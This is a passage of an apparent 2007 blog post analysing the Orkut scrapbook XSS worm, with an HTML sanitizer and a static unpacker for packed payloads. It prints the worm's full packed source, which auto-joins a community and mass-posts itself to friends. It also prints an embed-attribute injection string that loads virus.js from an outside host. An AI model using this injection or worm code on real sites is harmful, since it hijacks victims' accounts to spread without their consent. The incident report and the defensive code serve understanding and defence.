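  ['b', []], ['i', []], ['u', []], ['br', []], ['p', []], ['a', ['href']],
]);

// Text outside tags is re-escaped so a stray "<" cannot start a new tag.
function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Only absolute http(s) links; this rejects javascript:, data:, vbscript:
// and obfuscated schemes such as "java\tscript:".
function safeHref(v) {
  return /^https?:\/\/[^\s"'<>]+$/i.test(v) ? v : null;
}

function sanitizeScrap(html) {
  const tagRe = /<\s*(\/?)([a-zA-Z][a-zA-Z0-9]*)([^<>]*?)\s*\/?\s*>/g;
  const attrRe = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let out = '';
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index));   // text between tags
    last = tagRe.lastIndex;
    const closing = m[1] === '/';
    const name = m[2].toLowerCase();
    if (!ALLOWED.has(name)) continue;               // drop the whole tag
    if (closing) { out += `</${name}>`; continue; }
    let kept = '';
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(m[3])) !== null) {
      const attr = a[1].toLowerCase();
      if (!ALLOWED.get(name).includes(attr)) continue;   // on*, style, wmode...
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      const safe = attr === 'href' ? safeHref(value) : value;
      if (safe !== null) kept += ` ${attr}="${escapeText(safe)}"`;
    }
    out += `<${name}${kept}>`;
  }
  return out + escapeText(html.slice(last));
}

// Constructed sample modelled on the worm's scrap: the text and the <embed>
// are what the packed script builds (the wmode value is its JavaScript
// string break-out); the javascript: link and the handlers are added here.
const WORM_STYLE_SCRAP =
  '2008 vem ai... que ele comece mto bem para vc<br/>' +
  '<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" ' +
  "wmode=\"transparent');r=document.createElement('script');" +
  "r.src='http://files.myopera.com/virusdoorkut/files/virus.js';" +
  "document.getElementsByTagName('head')[0].appendChild(r);escape('\" " +
  'width="1" height="1"></embed>' +
  '<a href="javascript:alert(1)" onclick="alert(2)">link</a><b onmouseover=alert(3)>hi</b>';

console.log(sanitizeScrap(WORM_STYLE_SCRAP));
// 2008 vem ai... que ele comece mto bem para vc<br><a>link</a><b>hi</b>
```

A production sanitizer would also balance unclosed tags and must run on the server, where the client cannot skip it; the shape of the rule is the point: allow-list tags and attributes, drop everything else, and never let an attribute value reach a JavaScript string unescaped.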
It's fair to say that almost every member of that community was an involuntary signup. So based on the reported peak size of the community, more than 655,000 users were affected.
The attack was apparently without malicious intent and done just to highlight the security problems with such networking sites. Although the motives might be clean, I question the modus operandi. McAfee folks have named this W32/KutWormor.
This post got linked from various places including several bloggers, News.com, ZDNet and Valleywag(!). But, as Valleywag points out, if this had happened on MySpace or Facebook, it would be all over the US media.
No official word from Orkut yet on this except this reply in a forum thread. Amusingly, the list of suggestions offered in that reply to 'stay safe' wouldn't have helped at all with this worm! It needed no click from the victim and would have worked anyway unless you had Flash and/or JavaScript disabled.
Curiously enough, the official Orkut blog got a new post during/after this incident but the post says absolutely nothing about what happened!
That's the summary and hopefully the last update here! The original post covering this worm follows below.
Someone (maybe Rodrigo Lacerda, see below) seems to have found an XSS attack for Orkut. A piece of JavaScript code, named virus.js and fetched from a myopera location, somehow made its way into my Orkut session and started scrapping everyone possible at break-neck speed. My friends reported Portuguese-language (not Spanish, see first comment below) scraps with some Flash content from me, while I've seen similar scraps in my Scrapbook.
From my initial Firebug console digging, this code sneaks in when opening the Scrapbook page. And the attack code is fetched just after loading gtalknotifier004.js so perhaps there's an XSS hole in that script. Not sure though, I'm a JS newbie :-)
For now, don't log on to Orkut! Or if you use Adblock, just block anything named *virus.js
Does anyone know how the hell should I report such stuff to Orkut? I can't seem to locate any vulnerability report form in their support pages.
Update: If you've blocked the virus.js file, log in and check your communities. You'll see an extra one! If you aren't able to unjoin the community, don't panic. I believe it's just an automated throttling response by Orkut's systems as a response to the massive scrapping initiated from our account. Should be fixed in a few hours.
Update: The embedded Flash in the notorious scrap (2008 vem ai... que ele comece mto bem para vc, roughly "2008 is coming... may it start really well for you") is also part of the exploit. I don't know exactly what it does since I use Flashblock all the time! Also, some blogs are suggesting changing of passwords. I don't think that's needed since I don't believe passwords have been compromised. Of course, don't treat my opinion as infallible advice, do what you must. I know I'm not changing my password just because of this!
Update: Reader Steve (thanks!) informs me in the comments below that this hole was reported sometime back and was already fixed. From this page:
On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.
And the actual report referenced in the above quote: Orkut Group Cross Site Scripting Vulnerability. I don't know enough to say whether the situation we are seeing today is due to the same vulnerability.
Update: People seem to think that somehow they were responsible for facilitating this attack. Like perhaps they clicked on a bad link or something. From what I understand, this isn't a phishing attack and there's nothing you could've done to prevent this. Except, maybe, not visiting Orkut.com!
Update: Apparently fixed! The virus.js file is no longer fetched and all the spam scraps in my scrapbook have disappeared. I could unjoin the 'special' community too, which at this point of time has 390,262 members, which means (at least) 390,262 affected users. That's not good!
Update: More from Reader Steve in the comments. Apparently, the community that we all are involuntarily a part of now, is some kind of vigilante community created just to make a point that these systems are insecure. Steve's comment:
The infected group is called "Infectados pelo Vírus do Orkut" and has nearly 400K members (minus me now).
The group description (loosely translated via Babelfish) is:
In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.
Update: Some readers have kindly posted deobfuscated versions of the virus.js script. Thanks! Since they weren't fitting well in the comments below, I've moved them to a pastebin site. See version 1 and version 2. I'll post some analysis if I get time to do some!
The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js
// Dean Edwards-style p,a,c,k,e,d bootstrap: rebuilds the original source from
// the packed body and the base-62 token dictionary below, then hands the
// result to setTimeout(..., 1), which evaluates it. The two long string
// literals are written as concatenated pieces.
function $(p,a,c,k,e,d) {
e=function(c) {
return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
// Unpacked, the body reads POST_TOKEN and signature from Orkut's JSHDF page
// object, joins community 44001818 via CommunityJoin.aspx, fetches the friend
// list from Compose.aspx, POSTs the scrap (text plus <embed>) to every friend
// via Scrapbook.aspx, and keeps its position in a 'wormdoorkut' cookie.
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}' +
'L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};' +
'7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");' +
'8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};' +
'5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};' +
'7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};' +
'7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");' +
't.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};' +
'3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);' +
'3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};' +
'7 V(){6(j==8.18("N").M){b};' +
'5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o=\\"o://k.w.p/28.z\\" 2a=\\"Q/x-2c-2d\\" 2e=\\"2g\');' +
'r=8.1n(\'r\');r.1o=\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1C=\\"1\\" 1E=\\"1\\"></13>";' +
'5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();' +
'3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");' +
'3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};' +
'6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();',
62,150,('|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|' +
'www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx' +
'|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|' +
'signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|' +
'readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|' +
'getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|' +
'createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|' +
'setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|' +
'history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|' +
'wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera' +
'|XMLHttpRequest|substring|virusdoorkut|CGI|Page').split('|'),0,{}),1
);
author="Rodrigo Lacerda"
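If you would rather not wait for readers to post deobfuscated versions, the packed form above can be decoded statically. The following is an added example, not the worm's code and not from the original post: it reproduces the p,a,c,k,e,d token substitution in JavaScript but returns the source as a string instead of evaluating it, then pulls the URLs out of the result. The sample it runs on is a hand-packed one-liner constructed for this example, using the hypothetical host example.invalid rather than the worm's real payload.

```javascript
// Added example, not part of the original post or of the worm: a static
// unpacker for Dean Edwards-style p,a,c,k,e,d payloads like the one above.
// It performs the same base-`a` token substitution the packer's bootstrap
// performs, but returns the source as a string instead of passing it to
// setTimeout()/eval(), so nothing in the sample ever executes.

// Mirrors the packer's e(): dictionary index -> token (base-`a` digits,
// 0-9a-z for values below 36, then A-Z).
function encode(index, base) {
  const high = index < base ? '' : encode(Math.floor(index / base), base);
  const low = index % base;
  return high + (low > 35 ? String.fromCharCode(low + 29) : low.toString(36));
}

// p = packed body, a = radix, c = dictionary size, k = dictionary array.
// Only whole words are replaced (the packer used \b...\b); tokens whose
// dictionary slot is empty, and words outside the dictionary, are kept as-is.
function unpack(p, a, c, k) {
  const dict = new Map();
  for (let i = 0; i < c; i++) {
    if (k[i]) dict.set(encode(i, a), k[i]);
  }
  return p.replace(/\b\w+\b/g, tok => (dict.has(tok) ? dict.get(tok) : tok));
}

// Decodes the escapes a single-quoted JS literal can carry (\' \\ \n \t \r).
function unquote(s) {
  const map = { n: '\n', t: '\t', r: '\r' };
  return s.replace(/\\(.)/g, (_, ch) => (ch in map ? map[ch] : ch));
}

// Locates the `('...', a, c, '...'.split('|'), 0, {})` argument list inside an
// eval(function(p,a,c,k,e,d){...}(...)) or $(...) wrapper and returns the parts.
function parsePacked(text) {
  const m = text.match(
    /\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/
  );
  if (!m) throw new Error('no p,a,c,k,e,d call found');
  return { p: unquote(m[1]), a: Number(m[2]), c: Number(m[3]), k: unquote(m[4]).split('|') };
}

// Pulls absolute URLs out of the recovered source: the indicators you want
// for an Adblock rule or a proxy block list.
function extractUrls(source) {
  return source.match(/https?:\/\/[^\s'"<>]+/g) || [];
}

function analyze(text) {
  const { p, a, c, k } = parsePacked(text);
  const source = unpack(p, a, c, k);
  return { source, urls: extractUrls(source) };
}

// Constructed sample (hypothetical host, not the worm's real payload): a
// hand-packed one-liner that injects a <script> tag, wrapped the way the
// packer emits it. String.raw keeps the \' escapes intact.
const SAMPLE = String.raw`eval(function(p,a,c,k,e,d){/* bootstrap elided */}('0 1=2.3(\'4\');1.5=\'6://7.8/9.a\';2.b.c(1)',62,13,'var|s|document|createElement|script|src|http|example|invalid|virus|js|head|appendChild'.split('|'),0,{}))`;

const result = analyze(SAMPLE);
console.log(result.source);
// var s=document.createElement('script');s.src='http://example.invalid/virus.js';document.head.appendChild(s)
console.log(result.urls);
```

Feed it the text of virus.js and the recovered source is what the packer started from; the URL list is what goes into the Adblock rule mentioned earlier, and nothing in the payload runs while you look at it.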
techtalk | 30 comments | permalink | 19.12.2007 12:08 SGT